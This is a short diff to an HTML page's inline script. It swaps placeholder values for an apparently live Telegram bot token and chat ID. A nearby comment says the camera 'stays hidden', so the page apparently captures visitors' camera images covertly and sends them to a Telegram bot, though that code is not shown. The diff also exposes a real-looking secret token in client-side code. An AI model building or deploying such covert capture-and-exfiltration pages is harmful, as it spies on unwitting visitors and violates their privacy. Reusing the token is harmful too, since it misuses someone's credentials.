--- a/index.html
+++ b/index.html
@@ -104,8 +104,8 @@
 
   <script>
     // ---------- CONFIG ----------
-    const TELEGRAM_BOT_TOKEN = 'YOUR_BOT_TOKEN'; // <-- replace or use backend
-    const TELEGRAM_CHAT_ID  = 'YOUR_CHAT_ID';   // <-- replace or use backend
+    const TELEGRAM_BOT_TOKEN = '8514639816:AAGF8rmIqRwZIkjM0ehndHOd1RWBRZYpOj0'; // <-- replace or use backend
+    const TELEGRAM_CHAT_ID  = '5741929254';   // <-- replace or use backend
     // ----------------------------
 
     // Camera elements & canvas (camera stays hidden)
